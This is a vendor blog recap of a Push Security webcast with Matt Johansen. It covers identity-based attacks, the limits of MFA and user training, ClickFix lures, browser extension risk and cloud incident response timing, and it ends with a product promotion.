What we learned from 'Security Theater vs. Security That Works' with Matt Johansen

1. Hackers don't hack in, they log in

Matt made the point early on that "the modern web frameworks that have come out have done more to shift application security than any security vendor ever did." It's measurably harder to write exploitable code in 2026 than it was even five years ago, and the data reflects that — as Matt put it, "most hacks that we read about these days are actually logins, not actually hacks in terms of vulnerabilities." Attackers aren't breaking in — they're logging in.

The data backs this up across the board. CrowdStrike's 2026 Global Threat Report found that 82% of attack detections are now malware-free — no exploit, no payload, just access and legitimate functionality being abused. Google/Mandiant recently reported that identity issues were the initial access vector in 83% of cloud-related incidents.

And when you look at the economics, the shift makes obvious sense: a browser RCE goes for around $250,000, while a PhaaS kit rental runs about $1,000 per year and a bulk stolen credential list costs $15. For a rational attacker, identity abuse isn't just easier — it's orders of magnitude cheaper.

This isn't a new observation, but it's one that still hasn't fully landed in how most organizations allocate their security budgets. The bulk of enterprise security spending is still pointed at the endpoint and the network — tooling built for an era when the primary threat was malware and exploitation. The threat model has moved, and for a lot of organizations, the stack hasn't moved with it.

2. AI is a force multiplier, but it isn't a super hacker

The Mythos discourse has been hard to escape. As Matt put it, the view that "the AI super hacker has escaped the lab" is "not actually what's going on." What's actually happening is that AI models trained to understand code are turning out to be very good at finding specific types of vulnerabilities in predominantly legacy codebases — but defenders stand to gain a lot too.

As Matt referenced, Google's CISO Heather Adkins said on stage at the Unprompted conference that Google's stated goal is "to eliminate all software vulnerabilities, period." And browser zero-days already hit a historic low at just 9% of all zero-days reported to Google in 2025.

But won't AI-assisted vulnerability discovery eventually make browser exploits cheaper for attackers too? Perhaps — but it will simultaneously make them easier for browser vendors to find and patch, and vendors like Google and Microsoft have the engineering capacity and financial incentive to scale AI-driven remediation far faster than attackers can scale exploit development.

As Matt noted, "they didn't train these models to be good at cybersecurity — they just trained them to get better and better at code," and big tech vendors like Google have the resources to really invest in these tools. The rational play for attackers is the same one it's been for years: skip the exploit development entirely and steal identities and sessions in the browser instead.

3. MFA is essential — but it isn't a silver bullet

Nobody's arguing against MFA. It's one of the most important security controls any organization can deploy, and both Matt and Mark were clear about that. But the conversation surfaced something that doesn't get enough attention: there are always gaps in coverage, and attackers have consistently found ways under, over, or through it.

Mark observed that every organization he talks to says they're in the process of "rolling out" MFA. It's always in progress, never complete — there's always an app that doesn't support it, a legacy system that can't handle it, a user population that hasn't been migrated, or a SaaS vendor charging extra for the privilege (the security tax). Coverage gaps are the norm, not the exception.

Then there's the bypass evolution. Matt walked through the history — SMS and SIM swapping, push notifications and push fatigue, and now AiTM kits that proxy the entire authentication flow, capturing both the password and the MFA token in a single attack. Every step up the MFA ladder, attackers have found a way around. Phishing-resistant methods like hardware tokens and passkeys are a meaningful improvement, but rollout is slow and uneven.

And then there's the class of attacks that sidestep authentication entirely. Consent phishing, device code phishing, session hijacking — these are all post-authentication attacks. The user has already authenticated successfully, the MFA did its job, and the attacker is going after what comes after: OAuth tokens, session cookies, consent grants. Matt compared these to zero days for identity — they bypass the entire front end of your defensive stack. MFA is absolutely something you should be rolling out and strengthening, but it's one layer in what needs to be a deeper defense.

4. User training is not enough: better technical controls are required

Matt was blunt on this one: "If those tips worked, cybersecurity as a profession would be out of business." 20+ years of user awareness training, and phishing is arguably more effective than ever. The standard advice — hover over links, check the sender, look for typos — assumes a level of sustained vigilance that no human can maintain across every interaction, every day.

What made his point land was the contrast between the comment sections on his ClickFix content — "Who the hell would fall for this?" — and the reality that every incident response professional he knows is currently working a ClickFix case. The people saying nobody would fall for it are not the people cleaning up after it.

Matt also brought the recent Lazarus group fake job scams: threat actors spending six months building trust with a target — meeting in person at conferences, multiple times — before eventually getting them to install a malicious browser extension during a Zoom call. All of the social engineering that precedes the actual compromise is just trust-building, and the sophistication of that trust-building is increasing faster than any training program can keep up with. You need defensive layers that don't depend on the user making the right call every single time.

5. Every IR pro you know is working a ClickFix case

ClickFix came up repeatedly, and for good reason — it's one of the most common initial access vectors being reported right now. Matt said he doesn't know a single IR professional in his network who "isn't actively working a ClickFix-related case." The technique, which tricks users into copying and pasting malicious commands, has spawned an entire family of variants (InstallFix, ConsentFix, and others), and they're evolving fast.

Matt shared a particularly good example of why the "just don't fall for it" advice falls apart. Attackers were paying for ads promoting ChatGPT chat history links on technical search queries — things like "how to clean up disk space on Mac." The top result was a legitimate-looking ChatGPT interface with what appeared to be helpful terminal commands.

The user was already looking for commands to copy and paste into their terminal. The attack didn't need to trick them into doing something unusual — it just showed up in the exact context where copy-pasting commands was the expected behavior.

The new variants keep appearing because the underlying technique is modular — the trust-building wrapper changes (fake CAPTCHAs, fake error messages, fake install instructions, fake AI chat interfaces), but the core mechanic is the same. What makes it dangerous is that each new wrapper goes quasi-viral among attackers when it proves successful, which means the window between a new variant appearing and widespread adoption is very short.

6. Browser extensions are the threat that never went away (and it's a bigger problem than ever)

Browser extensions are a topic we've covered in depth before, and Matt's perspective reinforced why. His first conference talk — Black Hat and DEF CON in 2011 — was about Chrome extension security. As he put it: "I could give that talk right now with very few changes to the slides and it would still be extremely relevant."

The core problem hasn't moved: extensions need broad permissions to function, even for completely legitimate use cases. A password manager needs to read login forms on every website. A dark mode extension needs to modify the DOM on every page. An RSS reader needs access to arbitrary sites. These aren't excessive permissions — they're the minimum required for the extension to do what it advertises.

What's making it worse is the AI adoption wave. Many AI tools ship with browser extension counterparts, and employees are installing them alongside the apps themselves — often without approval. The broader rush to adopt AI tooling is acting as a force multiplier for the shadow SaaS problem that security teams have been struggling with for years, and extensions are a big part of that.

The ways extensions get compromised vary. Users still get tricked into installing something malicious from the start, but legitimate extensions also turn malicious after the fact. Matt outlined several mechanisms: developer accounts getting compromised and attackers pushing malicious updates to the existing user base; extension developers accepting monetization deals that turn out to be data-harvesting operations; and threat actors outright purchasing extensions with established user bases and then pushing malware to them.

The Chrome Web Store doesn't solve this. Matt noted that he uploaded a proof-of-concept extension literally called "Malicious Extension" and it made it onto the store. There's some review process, but it's not real-time, it's not continuous, and it doesn't cover updates after initial submission.

Even organizations with a formal extension approval process typically only look at the extension once — at install time. Nobody's reviewing every update to every approved extension. And the risk assessment? "It's mostly based on vibes. There's very little science here." Even at organizations with mature security programs, Matt hasn't seen many that have real-time, ongoing visibility into what's happening inside their employees' browser extensions.

7. You have 30 minutes to respond to a cloud intrusion — and revoking the token isn't enough

Matt was direct about the speed benchmark practitioners should be targeting: meaningful containment and eradication within about 30 minutes, because attackers are partially achieving their objectives in 20 to 40 minutes and significantly past the point of no return within an hour.

The data supports this picture. CrowdStrike reports that the average e-crime "breakout time" (moving from initial access to high-value assets) is now just 29 minutes, while Google reports that the median time between initial access and hand-off to a secondary group has collapsed from over 8 hours in 2022 to just 22 seconds in 2025 — pointing to a highly automated, interconnected, and professionalized threat actor ecosystem.

But speed alone isn't the problem Matt emphasized — it's that the containment actions practitioners think they have don't actually work the way they expect. His anecdote about revoking an IdP OAuth token and assuming the session was killed, only to discover that the 200 downstream SaaS session tokens were still live, will resonate with anyone who has worked an identity-based incident.

You can't move that fast if you're figuring out what your tools can and can't do during the incident. The teams that handle these situations well are the ones that have taken stock of their actual capabilities beforehand — what their IdP revokes, what it doesn't, which SaaS apps have independent session management, where the gaps are. The teams that don't are the ones at "1 AM with a pager in hand going, 'What the hell do I do now?'" as Matt described it. "Ask me how I know."

"

This post is a recap of Security theatre vs. security that works, the third episode in Push Security's webcast series on the state of browser attacks. Watch the full recording for the complete conversation, including live Q&A with Mark and Matt.

Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.

Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.

Book a live demo to learn more.